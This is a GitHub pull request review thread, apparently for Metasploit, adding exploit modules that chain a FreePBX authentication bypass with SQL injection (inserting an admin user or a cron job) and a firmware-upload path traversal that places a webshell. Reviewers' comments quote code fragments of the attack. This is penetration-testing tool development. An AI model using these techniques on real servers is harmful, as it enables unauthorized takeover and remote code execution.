Adds modules for multiple CVEs for FreePBX (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039) #20846
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
Chocapikk
reviewed
Jan 5, 2026
| super( | ||
| update_info( | ||
| info, | ||
| 'Name' => 'FreePB endpoint SQLi to RCE', |
Contributor
There was a problem hiding this comment.
Suggested change
| 'Name' => 'FreePB endpoint SQLi to RCE', | |
| 'Name' => 'FreePBX endpoint SQLi to RCE', |
| super( | ||
| update_info( | ||
| info, | ||
| 'Name' => 'FreePBX firmeware file upload', |
Contributor
There was a problem hiding this comment.
Suggested change
| 'Name' => 'FreePBX firmeware file upload', | |
| 'Name' => 'FreePBX firmware file upload', |
msutovsky-r7
changed the title
jvoisin
reviewed
Jan 9, 2026
| info, | ||
| 'Name' => 'FreePBX Custom Extension SQL Injection', | ||
| 'Description' => %q{ | ||
| FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration. |
Contributor
There was a problem hiding this comment.
Suggested change
| FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration. | |
| FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new administrative user. |
| ) | ||
| ) | ||
| register_options([ | ||
| OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']), |
Contributor
There was a problem hiding this comment.
Suggested change
| OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']), | |
| OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']), |
| authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the | ||
| SQL injection in the custom extension component. | ||
| The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a | ||
| new fake user and effectively grants an attacker access to the administration. |
Contributor
There was a problem hiding this comment.
Suggested change
| new fake user and effectively grants an attacker access to the administration. | |
| new administrative user. |
| ### USERNAME | ||
|
|
||
| Performing authentication bypass requires the username of an existing user. | ||
| This username is used in the Authorization header along with a random password. |
Contributor
There was a problem hiding this comment.
Suggested change
| This username is used in the Authorization header along with a random password. |
This line is confusing and necessary in my opinion.
Comment on lines
+33
to
+39
| ### FAKE_USERNAME | ||
|
|
||
| Username for fake injected user. | ||
|
|
||
| ### FAKE_PASSWORD | ||
|
|
||
| Password for fake injected user. |
Contributor
There was a problem hiding this comment.
A quick git grep shows that NEW_USER or/and NEW_USERNAME are the prefered nomenclature.
There is nothing "fake" about the new user.
| def exploit | ||
| @job_name = Rex::Text.rand_text_alpha(4..7) | ||
|
|
||
| rce_payload = 'INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)' |
Contributor
There was a problem hiding this comment.
What if there is already a cronjob with the random name?
| @@ -0,0 +1,140 @@ | |||
| ## | |||
Contributor
There was a problem hiding this comment.
What's the point/advantage of this module compared to the cron-based one? Couldn't' the two be merged?
|
|
||
| register_options( | ||
| [ | ||
| OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']), |
Contributor
There was a problem hiding this comment.
Suggested change
| OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']), | |
| OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']), |
Comment on lines
+97
to
+106
| form_data.add_part(SecureRandom.uuid, nil, nil, 'form-data; name="dzuuid"') | ||
| form_data.add_part('0', nil, nil, 'form-data; name="dzchunkindex"') | ||
| form_data.add_part(payload.encoded.length.to_s, nil, nil, 'form-data; name="dztotalfilesize"') | ||
| form_data.add_part('2000000', nil, nil, 'form-data; name="dzchunksize"') | ||
| form_data.add_part('1', nil, nil, 'form-data; name="dztotalchunkcount"') | ||
| form_data.add_part('0', nil, nil, 'form-data; name="dzchunkbyteoffset"') | ||
| form_data.add_part("../../../var/www/html/#{@target_dir}", nil, nil, 'form-data; name="fwbrand"') | ||
| form_data.add_part('1', nil, nil, 'form-data; name="fwmodel"') | ||
| form_data.add_part('1', nil, nil, 'form-data; name="fwversion"') | ||
| form_data.add_part(payload.encoded, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{@target_payload}")) |
Contributor
There was a problem hiding this comment.
Can the values be randomized a bit?
| form_data.add_part('2000000', nil, nil, 'form-data; name="dzchunksize"') | ||
| form_data.add_part('1', nil, nil, 'form-data; name="dztotalchunkcount"') | ||
| form_data.add_part('0', nil, nil, 'form-data; name="dzchunkbyteoffset"') | ||
| form_data.add_part("../../../var/www/html/#{@target_dir}", nil, nil, 'form-data; name="fwbrand"') |
Contributor
There was a problem hiding this comment.
Is FreePBX always installed in /var/www/?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR adds modules for multiple CVEs (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039). This PR works as placeholder for now as modules are not finished, but contain the basic exploitation logic. All modules use authentication bypass (CVE-2025-66039). The CVE-2025-61675 describes multiple SQL injections, but the SQLi modules uses only one variant (one for user insertion, the other one for RCE).
WORK IN PROGRESS, TREAT AS SUCHThe CVE-2025-66039 represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user.
The CVE-2025-61675 describes multiple SQL injections; the modules exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.
The CVE-2025-61678 allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server’s directory.
To setup the environment, perform minimal installation from here. Note that Authorization Type needs to be set to webserver: